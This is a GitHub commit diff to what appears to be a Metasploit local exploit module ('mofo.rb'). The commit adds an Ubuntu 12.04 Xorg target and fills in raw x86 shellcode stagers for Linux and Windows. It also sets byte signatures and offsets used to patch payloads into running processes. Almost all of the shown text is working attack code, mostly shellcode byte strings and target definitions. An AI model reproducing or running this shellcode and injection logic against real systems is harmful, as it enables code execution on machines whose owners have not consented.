Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

added 12.04 Xorg

  • Loading branch information...
commit 403ed16851c9e3364ba469dc4e494b2dd940e419 1 parent 3394abb
dma authored
Showing with 21 additions and 8 deletions.
  1. +21 −8 module/mofo.rb
View
29 module/mofo.rb
@@ -6,8 +6,7 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info = {})
linuxStager=
"\xe8\x00\x00\x00\x00\x60\x31\xc0\xb0\xc0\x31\xdb\x31\xc9\xb5\x80\x99\xb2\x07\xbe\x22\x00\x00\x00\xcd\x80\xd1\xe9\x01\xc8\x66\xc7\x00\xff\xe0\xff\xe0"
- winStager=
-"\xe8\x00\x00\x00\x00\x60\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xbe\x78\x56\x34\x12\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x66\xc7\x00\xff\xe0\xff\xe0"
+ winStager="\xe8\x00\x00\x00\x00\x60\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xbe\x00\x01\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x6a\x00\x6a\x40\x68\x00\x01\x00\x00\x50\x68\x10\xe1\x8a\xc3\x66\xc7\x00\xff\xe0\xff\xe0"
winStage2 = { 'Patch' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x31\xc0\x50\x50\x50\x8d\x9d\xa5\x00\x00\x00\x53\x50\x50\x68\x38\x68\x0d\x16\xff\xd5\x61\x83\x2c\x24\x05\xc3\x58",
'Signature' => "\xff\xe0",
@@ -22,8 +21,8 @@ def initialize(info = {})
'Payload' => true,
}
debugStage2 = { 'Patch' =>
- "",
- 'Signature' => "\x90\x90\x90\x90\x90\x90\x90\x90",
+ "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x31\xc0\x50\x50\x50\x8d\x9d\xa5\x00\x00\x00\x53\x50\x50\x68\x38\x68\x0d\x16\xff\xd5\x61\x83\x2c\x24\x05\xc3\x58",
+ 'Signature' => "\xff\xe0\x00\x00\x00\x00\x00\x00",
'Offset' => 0,
'Payload' => true,
'Wait' => false,
@@ -54,14 +53,27 @@ def initialize(info = {})
'Platform' => 'windows',
'Arch' => ARCH_X86,
'Stages' => [ {
- 'Offset' => 0x312,
- 'Signature' =>"\x55\x57\x56\x53\x83\xEC\x5C\x8B\x44\x24\x70\xE8\x47\xDC\xFA\xFF",
+ 'Offset' => 0x312,
+ 'Signature' =>"\x83\xf8\x10\x0f\x85\x50\x94\x00\x00\xb0\x01\x8b",
'Space' => 2048,
'Payload' => false,
'Patch' => winStager,
'Wait' => true,
}, winStage2 ] }
],
+ [ 'ubuntu 12.04 Xorg', #md5 880c4be57a8eef5c97a177347defb776
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux',
+ 'Stages' => [ {
+ 'Offset' => 0x1F5,
+ 'Signature'=>"\x85\xED\x0F\x8E\xC8\x02\x00\x00\x8B\x8B\x08\xFF\xFF\xFF\x8B\x41",
+ 'Patch' => linuxStager,
+ 'Space' => 2048,
+ 'Payload'=> false,
+ 'Wait' => 3,
+ }, linuxStage2 ] }
+ ],
[ 'ubuntu 11.10 Xorg',
{
'Arch' => ARCH_X86,
@@ -116,6 +128,8 @@ def initialize(info = {})
'Stages' => [ linuxStage2 ] }
],
[ 'debug', {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'windows',
'Stages' => [ debugStage2 ] }
],
],
@@ -153,8 +167,7 @@ def exploit
if stage['Wait'] == true
puts 'Press enter if the current stage is run'
gets
- end
- if stage['Wait'] >= 1
+ elsif stage['Wait'] >= 1
puts "sleeping for " + stage['Wait'].to_s + " seconds"
sleep(stage['Wait'])
end
Please sign in to comment.
Something went wrong with that request. Please try again.